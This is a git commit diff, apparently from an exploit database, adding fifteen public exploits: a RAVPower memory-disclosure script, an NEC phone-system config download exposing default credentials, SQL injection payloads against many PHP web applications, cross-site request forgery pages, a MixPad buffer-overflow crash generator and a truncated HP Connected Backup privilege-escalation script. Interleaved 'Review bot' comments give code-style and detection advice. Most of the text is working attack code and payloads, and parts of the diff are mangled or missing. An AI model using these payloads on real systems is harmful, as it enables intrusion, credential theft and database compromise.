From a02c2710c90e401517bc74ed85c2d3d6fd9a3a5e Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 24 Jan 2018 05:01:58 +0000 Subject: [PATCH] DB: 2018-01-24 15 changes to exploits/shellcodes MixPad 5.00 - Buffer Overflow RAVPower 2.000.056 - Memory Disclosure HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download LiveCRM SaaS Cloud 1.0 - SQL Injection Affiligator 2.1.0 - SQL Injection RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin) Easy Car Script 2014 - SQL Injection Wchat 1.5 - SQL Injection Zechat 1.5 - SQL Injection Tumder 2.1 - SQL Injection Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin) Quickad 4.0 - SQL Injection Flexible Poll 1.2 - SQL Injection --- exploits/hardware/dos/43856.py | 49 ++++++++ exploits/multiple/webapps/43858.txt | 94 +++++++++++++++ exploits/php/webapps/43855.txt | 179 ++++++++++++++++++++++++++++ exploits/php/webapps/43860.txt | 26 ++++ exploits/php/webapps/43861.txt | 26 ++++ exploits/php/webapps/43862.html | 32 +++++ exploits/php/webapps/43863.txt | 26 ++++ exploits/php/webapps/43864.txt | 27 +++++ exploits/php/webapps/43865.txt | 27 +++++ exploits/php/webapps/43866.txt | 26 ++++ exploits/php/webapps/43867.html | 58 +++++++++ exploits/php/webapps/43868.txt | 66 ++++++++++ exploits/php/webapps/43869.txt | 29 +++++ exploits/windows/dos/43854.py | 39 ++++++ exploits/windows/local/43857.py | 78 ++++++++++++ files_exploits.csv | 15 +++ 16 files changed, 797 insertions(+) create mode 100755 exploits/hardware/dos/43856.py create mode 100644 exploits/multiple/webapps/43858.txt create mode 100644 exploits/php/webapps/43855.txt create mode 100644 exploits/php/webapps/43860.txt create mode 100644 exploits/php/webapps/43861.txt create mode 100644 exploits/php/webapps/43862.html create mode 100644 exploits/php/webapps/43863.txt create mode 100644 exploits/php/webapps/43864.txt create mode 100644 exploits/php/webapps/43865.txt create mode 100644 
exploits/php/webapps/43866.txt create mode 100644 exploits/php/webapps/43867.html create mode 100644 exploits/php/webapps/43868.txt create mode 100644 exploits/php/webapps/43869.txt create mode 100755 exploits/windows/dos/43854.py create mode 100755 exploits/windows/local/43857.py
diff --git a/exploits/hardware/dos/43856.py b/exploits/hardware/dos/43856.py
new file mode 100755
index 000000000..e97987312
--- /dev/null
+++ b/exploits/hardware/dos/43856.py
@@ -0,0 +1,49 @@
+"""
+
+# Exploit Title: RAVPower - remote stack disclosure
+# Date: 22/01/2018
+# Exploit Author: Daniele Linguaglossa
+# Vendor Homepage: https://www.ravpower.com/
+# Software Link: https://www.ravpower.com/
+# Version: 2.000.056
+# Tested on: OSX
+# CVE : CVE-2018-5319
+
+"""
+
+import socket
+import sys
+import re
+
+__author__ = "Daniele Linguaglossa"
+
+def redall(s):
+ tmp = s.recv(1)
+ while not str(tmp).endswith(""):
+ tmp+=s.recv(1)
+ print tmp
+ tmp = str(tmp).split("\r\n\r\n",1)[1]
+ return re.sub("[\x0a]+","", tmp,100)
+
+def hexdump(src, length=16):
+ FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
+ lines = []
+ for c in xrange(0, len(src), length):
+ chars = src[c:c+length]
+ hex = ' '.join(["%02x" % ord(x) for x in chars])
+ printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
+ lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable))
+ return ''.join(lines)
+
+if __name__ == "__main__":
+ if len(sys.argv) == 2:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((sys.argv[1],80))
+ packet = "GET /protocol.csp?fname=a&opt=%s&function=get HTTP/1.1\r\nConnection: close\r\nHost: {0}\r\n\r\n".format(sys.argv[1])
+ packet = packet % ("%0a"*12241)
+ s.send(packet)
+ result = redall(s)
+ print "Dumping memory...\n\n"
+ print hexdump(result)
+ else:
+ print "Usage: {0} ".format(sys.argv[0])
\ No newline at end of file
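Review bot: The file is Python 2-only (`print tmp`, `xrange`, str-based socket I/O) but neither the module docstring nor a shebang says so, and `redall` and `hexdump` carry no docstrings; I would add `# Python 2 only` to the header block and a one-line docstring on each helper, e.g. `"""Format src as offset / hex / printable-ASCII rows of `length` bytes."""` for hexdump. The `hex` local in hexdump shadows the builtin of the same name; `hex_bytes` reads better. The module docstring also lists no fixed firmware version or vendor reference beyond the homepage, which a reader assessing exposure would want. From the detection side, the request assembled in the `__main__` block is the thing a proxy or IDS rule can key on: a GET to `/protocol.csp` whose `opt` parameter is a run of thousands of `%0a` sequences, far outside any legitimate query length.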
diff --git a/exploits/multiple/webapps/43858.txt b/exploits/multiple/webapps/43858.txt new file mode 100644 index 000000000..b84c51719 --- /dev/null +++ b/exploits/multiple/webapps/43858.txt 
@@ -0,0 +1,94 @@ +NEC Univerge SV9100/SV8100 WebPro 10.0 Remote Configuration Download + + +Vendor: NEC Corporation +Product web page: http://www.nec.com +Affected version: WebPro <=10.00 + DSP Firmware Version: 12.11.00.02 + + +Summary: NEC's UNIVERGE® SV9100 is the unified communications (UC) +solution of choice for small and medium businesses (SMBs) who don't +want to be left behind. Designed to fit your unique needs, the UNIVERGE +SV9100 platform is a powerful communications solution that provides +SMBs with the efficient, easy-to-deploy, mobile technology that they +require. + +Desc: The gzipped telephone system configuration file 'config.gz' or +'config.pcpx' that contains the unencrypted data file 'conf.pcpn', +can be downloaded by an attacker from the root directory if previously +generated by a privileged user. Attacker can also sniff the network +and hijack the session id which resides in a GET request to further +generate the config file. The sessionid can also be brute-forced +because of its predictability containing 5-digit number. This will +enable the attacker to disclose sensitive information and help her +in authentication bypass, privilege escalation, system access and +denial of service via config modification. 
+ +Tested on: Henry/1.1 + NEC-i SV8100-NA 08.00/2.1 + NEC SV9100-GE 07.00.52/2.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5448 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5448.php + + +11.12.2017 + +-- + + +Disclosing default credentials with weak password policy: +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - + +# curl -O "http://192.168.1.1:8001/config.gz" ; gzip -d config.gz ; hexdump -C -s 0x041f220 -n 352 config + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 66253 100 66253 0 0 17171 0 0:00:03 0:00:03 --:--:-- 17168 +0041f220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +* +0041f300 00 00 00 6e 65 63 69 69 20 20 20 20 20 35 38 34 |...necii 584| +0041f310 34 37 20 20 20 01 00 74 65 63 68 20 20 20 20 20 |47 ..tech | +0041f320 20 31 32 33 34 35 36 37 38 02 00 41 44 4d 49 4e | 12345678..ADMIN| +0041f330 31 20 20 20 20 30 30 30 30 20 20 20 20 03 00 41 |1 0000 ..A| +0041f340 44 4d 49 4e 32 20 20 20 20 39 39 39 39 20 20 20 |DMIN2 9999 | +0041f350 20 04 00 55 53 45 52 31 20 20 20 20 20 31 31 31 | ..USER1 111| +0041f360 31 20 20 20 20 05 00 61 74 65 6c 20 20 20 20 20 |1 ..atel | +0041f370 20 35 38 34 34 37 20 20 20 02 00 20 20 20 20 20 | 58447 .. 
| +0041f380 + + +Level:User:Password:Role: +- - - - - - - - - - - - - + +1:atel:58447:MAN (Manufacturer) +1:necii:47544:MAN (Manufacturer) +1:necii:58447:MAN (Manufacturer) +2:sltech:12345678:IN (Installer) +2:tech:12345678:IN (Installer) +3:ADMIN1:0000:SA (System Administrator A) +3:admin1:0000:SA (System Administrator A) +4:ADMIN2:9999:SB (System Administrator B) +4:admin2:9999:SB (System Administrator B) +4:USER1:1111:UA (User Administrator) +5:USER1:1111441:UA (User Administrator) +5:user1:1111:UA (User Administrator) + + +SAVE_CONFIG() request (Save to PC) with brute-forceable session +that will generate the config.gz / config.pcpx config file: +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43855.txt b/exploits/php/webapps/43855.txt new file mode 100644 index 000000000..4d0eac761 --- /dev/null +++ b/exploits/php/webapps/43855.txt 
@@ -0,0 +1,179 @@ +Document Title: +=============== +CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1833 + + +Release Date: +============= +2018-01-22 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1833 + + +Common Vulnerability Scoring System: +==================================== +7.5 + + +Vulnerability Class: +==================== +SQL Injection + + +Current Estimated Price: +======================== +4.000€ - 5.000€ + + +Product & Service Introduction: +=============================== +CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of +need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel. +CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…). + +(Copy of the Homepage: http://centos-webpanel.com/features ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the CentOS Web Panel v0.9.8.12. + + +Vulnerability Disclosure Timeline: +================================== +2018-01-22: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +CWP +Product: CentOS Web Panel - (CWP) 0.9.8.12 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote sql-injection web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12 web-application. +The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms. 
+ +The sql-injection vulnerability is located in the `row_id` and `domain` value of the `Add a domain` module POST method request. +Remote attackers are able to manipulate the POST method request to execute own malicious sql commands on the application-side +of the web-application. The request method to inject is POST and the attack vector is application-side. The vulnerability can +be exploited by restricted user accounts against the web-application administrator. + +The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5. +Exploitation of the remote sql injection vulnerability requires no user interaction and only a low privileged web-application user account. +Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Add a domain + +Vulnerable Parameter(s): +[+] row_id +[+] domain + +Affected Module(s): +[+] Delete domain + + +Proof of Concept (PoC): +======================= +The remote sql-injecton vulnerability can be exploited by remote attackers with low privilege user account and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Add a domain +2. Delete the same domain +3. Intercept the http request with a session tamper +4. Manipulate in the POST method request the values `row_id` or `domain` with ' +5. Continue the request and an exploitable sql-exception becomes visible +6. Now the attacker can inject to the row_id and domain to execute malicious sql commands via restricted user account +7. Successful reproduce of the sql-injection vulnerability! 
+ + +--- SQL Error Exceptions --- +You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test-domain'' at line 1 +Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in +/usr/local/cwpsrv/htdocs/resources/admin/include/functions.php(1) : eval()'d code(1) : eval()'d code on line 5 + + +--- PoC Session logs [POST] --- +Status: 200[OK] +POST http://cwp.localhost:2030/index.php?module=list_domains +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] + Request Header: + Host[185.4.149.65:2030] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://cwp.localhost:2030/index.php?module=list_domains] + Cookie[cwpsrv-b66ec0f9742b8f4bd3407e0151cd756c=ae0c56ru1ver0k3d0cd1hh4147] + Connection[keep-alive] + POST-Daten: + ifpost[yes] + username[test-dom] + domain[SQL-INJECTION PAYLOAD!] + row_id[SQL-INJECTION PAYLOAD!] + Response Header: + Date[Mon, 25 Apr 2016 12:32:33 GMT] + Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27] + X-Powered-By[PHP/5.4.27] + Expires[Thu, 19 Nov 1981 08:52:00 GMT] + Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] + Pragma[no-cache] + Keep-Alive[timeout=5, max=100] + Connection[Keep-Alive] + Transfer-Encoding[chunked] + Content-Type[text/html] + + +Reference(s): +http://cwp.localhost:2030/ +http://cwp.localhost:2030/index.php +http://cwp.localhost:2030/index.php?module=list_domains + + +Security Risk: +============== +The security risk of the remote sql-injection web vulnerability in the centos web panel application is estimated as high. 
(CVSS 7.5) + + +Credits & Authors: +================== +Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, +including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised +of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing +limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. \ No newline at end of file diff --git a/exploits/php/webapps/43860.txt b/exploits/php/webapps/43860.txt new file mode 100644 index 000000000..ac4506a37 --- /dev/null +++ b/exploits/php/webapps/43860.txt 
@@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: LiveCRM SaaS Cloud 1.0 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://livecrm.co/ +# Software Link: https://codecanyon.net/item/livecrm-saas-cloud-cloud-based-open-source-complete-business-management-solution-crm/21219419 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5985 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/livecrm/web/index.php?r=site/login&company_id=[SQL] +# +# %31%20%4f%52%20%31%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%33%61%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%20%48%41%56%49%4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%31 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43861.txt b/exploits/php/webapps/43861.txt new file mode 100644 index 000000000..44ebd1f92 --- /dev/null +++ b/exploits/php/webapps/43861.txt 
@@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Affiligator - Affiliate Webshop Management System 2.1.0 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: https://www.getaffiligator.com/ +# Software Link: https://codecanyon.net/item/affiligator-affiliate-webshop-management-system/21214946 +# Version: 2.1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5977 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search/?q=&price_type=range&price=[SQL] +# +# %31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43862.html b/exploits/php/webapps/43862.html new file mode 100644 index 000000000..8d7bb3e5b --- /dev/null +++ b/exploits/php/webapps/43862.html @@ -0,0 +1,32 @@ + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43863.txt b/exploits/php/webapps/43863.txt new file mode 100644 index 000000000..755af41bc --- /dev/null +++ b/exploits/php/webapps/43863.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Easy Car Script 2014 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://www.easyphotostore.com/ +# Software Link: http://www.easycarscript.com/ +# Version: 2014 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5986 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL] +# +# %35%31%20%2f%2a%21%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%35%35%35%35%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%30%35%35%35%35%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%2c%64%61%74%61%62%61%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43864.txt b/exploits/php/webapps/43864.txt new file mode 100644 index 000000000..09a2cabee --- /dev/null +++ b/exploits/php/webapps/43864.txt 
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://bylancer.com/ +# Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319 +# Version: 1.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5979 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/login.php +# +# User: ' UNION ALL SELECT 0x31,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0x34-- XXX +# Pass: anything +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43865.txt b/exploits/php/webapps/43865.txt new file mode 100644 index 000000000..812bfa7ad --- /dev/null +++ b/exploits/php/webapps/43865.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://bylancer.com/ +# Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266 +# Version: 1.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5978 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/login.php +# +# User: ' UNION ALL SELECT 0x31,0x32,0x33,concat(0x63)-- A +# Pass: anything +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43866.txt b/exploits/php/webapps/43866.txt new file mode 100644 index 000000000..d27495aab --- /dev/null +++ b/exploits/php/webapps/43866.txt 
@@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Tumder - An Arcade Games Platform 2.1 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://sndr.co.ve/ +# Software Link: https://codecanyon.net/item/tumder-an-arcade-games-platform/18726994 +# Version: 2.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5984 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/category/[SQL] +# +# %2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43867.html b/exploits/php/webapps/43867.html new file mode 100644 index 000000000..681e9e226 --- /dev/null +++ b/exploits/php/webapps/43867.html @@ -0,0 +1,58 @@ + + + + +

New Admin

+
+
+ +

+ + +

+ + +

+ + +

+ + +
+
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43868.txt b/exploits/php/webapps/43868.txt new file mode 100644 index 000000000..fb2af29e9 --- /dev/null +++ b/exploits/php/webapps/43868.txt 
@@ -0,0 +1,66 @@ +# # # # # +# Exploit Title: Classified Ads CMS - Quickad 4.0 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://bylancer.com/ +# Software Link: https://codecanyon.net/item/quickad-classified-ads-php-script/19960675 +# Version: 4.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5972 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/listing?keywords=[SQL]&location=All%20United%20States&placetype=country&placeid=231[SQL]&cat=[SQL]&subcat=5[SQL]&filter=&sort=Newest&Submit= +# +# ' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gLLf +# +# Parameter: keywords (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: keywords=a%' AND 1665=1665 AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: keywords=a%' AND (SELECT 7944 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(7944=7944,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Parameter: placeid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: keywords=a&location=All United States&placetype=country&placeid=231') AND 1976=1976 AND ('lFmx'='lFmx&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: keywords=a&location=All United States&placetype=country&placeid=231') AND (SELECT 
3263 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(3263=3263,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('psTy'='psTy&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 31 columns +# Payload: keywords=a&location=All United States&placetype=country&placeid=231') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7871,0x465344587867724149544c5a556147787a5876737447595477725372556d4a576c786c50546d7667,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJTp&cat=&subcat=5&filter=&sort=Newest&Submit= +# +# Parameter: subcat (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND 7923=7923 AND ('zhKR'='zhKR&filter=&sort=Newest&Submit= +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND (SELECT 5797 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(5797=5797,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('SvkR'='SvkR&filter=&sort=Newest&Submit= +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 31 columns +# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') UNION ALL SELECT CONCAT(0x71706a7871,0x6d72485769576563544a7a73516f67797544477a67515556755054545146717253556e676e705a74,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jcSO&filter=&sort=Newest&Submit= +# +# Parameter: cat (GET) +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: 
keywords=a&location=All United States&placetype=country&placeid=231&cat=' UNION ALL SELECT NULL,CONCAT(0x71706a7871,0x786a716b7066557459416e78454b506469534c61464f6d78664e434a49506c494b7a795243554556,0x716a6b6271),NULL-- gLLf&subcat=5&filter=&sort=Newest&Submit= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43869.txt b/exploits/php/webapps/43869.txt new file mode 100644 index 000000000..540134634 --- /dev/null +++ b/exploits/php/webapps/43869.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Flexible Poll 1.2 - SQL Injection +# Dork: N/A +# Date: 23.01.2018 +# Vendor Homepage: http://ddywpro.com/ +# Software Link: https://codecanyon.net/item/flexible-poll/4363114 +# Version: 1.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-5988 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?id=[SQL] +# +# 2) +# http://localhost/[PATH]/mobile_preview.php?id=[SQL] +# +# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/dos/43854.py b/exploits/windows/dos/43854.py new file mode 100755 index 000000000..ce59985fb --- /dev/null +++ b/exploits/windows/dos/43854.py 
@@ -0,0 +1,39 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
+# Date: 21-01-2017
+# Vulnerable Software: NCH Software MixPad
+# Vendor Homepage: http://www.nch.com.au/mixpad
+# Version: v5.00
+# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
+# Tested On: Windows XP
+#
+#
+# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound'
+#
+# no unicode jmp/call to esp
+#
+# EAX 00117700
+# ECX 001167F0
+# EDX 7C90E514 ntdll.KiFastSystemCallRet
+# EBX 00000000
+# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
+# EBP 00116FAC
+# ESI 0000004E
+# EDI 00117740
+# EIP 00CC00CC
+
+filename="crash.txt"
+
+junk = "A"*251
+eip = "\xcc"*2 #eip over; jmp/call esp goes here
+fill = "B"*100 #only 6 used in esp
+buffer = junk + eip + fill
+
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/local/43857.py b/exploits/windows/local/43857.py
new file mode 100755
index 000000000..89c5cf140
--- /dev/null
+++ b/exploits/windows/local/43857.py
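Review bot: The header line `# Date: 21-01-2017` disagrees with the index entry this same commit adds to files_exploits.csv (`2018-01-23`) and with every other file in the batch, so it is presumably a typo for 2018, though the crash could have been found earlier. The file is opened, written and closed by hand, and the result is held in `buffer`, which shadows a Python 2 builtin; `with open(filename, 'w') as textfile:` / `    textfile.write(payload)` closes the handle even if the write raises. The `print`-free body happens to be version-neutral, but the shebang selects whatever `python` is on the path, so the header should state which interpreter the crash file was generated with.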
@@ -0,0 +1,78 @@
+#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64
+
+import os
+import sys
+import time
+import requests
+from bs4 import BeautifulSoup
+
+def send_request(body):
+ url="http://localhost:16386/"
